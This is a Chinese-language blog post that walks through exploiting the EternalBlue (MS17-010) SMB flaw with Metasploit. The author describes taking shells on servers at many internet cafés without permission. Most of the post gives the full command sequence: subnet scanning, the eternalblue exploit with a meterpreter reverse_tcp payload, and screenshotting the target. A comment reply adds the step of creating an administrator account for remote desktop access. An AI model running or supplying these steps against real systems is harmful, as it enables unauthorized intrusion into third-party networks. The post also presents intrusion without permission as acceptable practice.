永恒之蓝ms17_010漏洞复现–拿网吧服务器shell

永恒之蓝ms17_010漏洞复现–拿网吧服务器shell

首先不得不吐槽一下,永恒之蓝这个漏洞虽然已经过去一年多了。但是至今任然还有很多没有修复,特别是在内网中,尤为常见。在上一篇文章中,通过修改bios中启动先后顺序,进入了我们自己的kali linux系统中。网吧也算作是中小型的局域网。在我实际的渗透过程中,发现大部分网吧的服务器或者是前台的主机基本上都是没有修复ms17_010这个漏洞的。所以配合我们kali里的metasploit拿下网吧服务器的shell就是很容易的事了。

相信大家对这张图都不陌生,去年轰动一时WannaCry勒索病毒

先简单介绍一下这个漏洞。

EternalBlue(永恒之蓝)据称是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的模块,由于其涉及漏洞的影响广泛性及利用稳定性,在被公开以后为破坏性巨大的勒索蠕虫 WannaCry所用而名噪一时。永恒之蓝是指2017年5月13日起,全球范围内爆发的基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。


也正是因为上一篇文章的铺垫,所以在网吧复现了这个永恒之蓝的漏洞。我去了很多家网吧,发现这个漏洞普遍存在。再加上msf,几乎我去过的网吧,都拿到了shell。但我还是坚持着只研究漏洞的原则,所以并没有做什么破坏性的事。这篇文章虽然是真实的一次渗透,但我还是希望大家不要拿去搞事情。

由于已经多次拿到网吧服务器shell了,且不方便在网吧写作。所以这次就用虚拟机进行漏洞复习了。

习惯性地在终端输入ifconfig查看网卡信息。

以我的ip为例,是192.168.0.101。此时我们打开msfconsole终端。

简单介绍一下metasploit,来自百度百科。

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
PS:下面所有红色字体标注的都是执行的命令
在msf终端搜索ms17_010的相关模块。
search ms17_010
因为是对内网中存在445端口开放的主机进行扫描。所以
use auxiliary/scanner/smb/smb_ms17_010

接着查看当前模块的各项参数信息。

show options

设置rhosts为当前的网段,我当前的网段为192.168.1/24.

set rhosts 192.168.0.1/24

然后设置当前的线程数。不设置则默认为1,扫描速度会很慢。可设置得大一些。

set threads 100

参数都设置好之后便开始执行模块。

run

发现192.168.1.110开放了445端口。接着开始我们的进一步渗透,选择ms17_010的exp。

use exploit/windows/smb/ms17_010_eternalblue

并设置我们的攻击载荷,建立反向tcp连接。也是在内网渗透中用的最多的一种。

set payload windows/x64/meterpreter/reverse_tcp

show options #查看当前需要配置的各项参数

set rhost 192.168.1.110  #设置目标主机ip

set lhost 192.168.1.101  #设置当前主机ip

exploit  #执行

成功弹回meterpreter会话,这也意味着我们已经渗透成功,拿到了目标主机的shell。

执行sysinfo,查看目标主机的系统信息。

screenshot   #在目标主机上进行截图

放一张我在网吧服务器上渗透成功的截图。

这就是整个ms17_010漏洞复现的过程。我几乎去了周围所有的网吧,发现该漏洞都还普遍存在。

至于如何进一步提权,就属于后渗透过程了,在我以后的文章中会深入讲解。

赞赏

微信赞赏支付宝赞赏

Zgao

愿有一日,安全圈的师傅们都能用上Zgao写的工具。

2条评论

Noth 发布于7:40 下午 - 11月 9, 2019

已經是連上3389port了嗎? (Romote Desktop Protocal ) ?

    zgao 发布于10:23 下午 - 11月 9, 2019

    是的,拿到了主机shell后,新建管理员账户再3389连接即可

回复 zgao 取消回复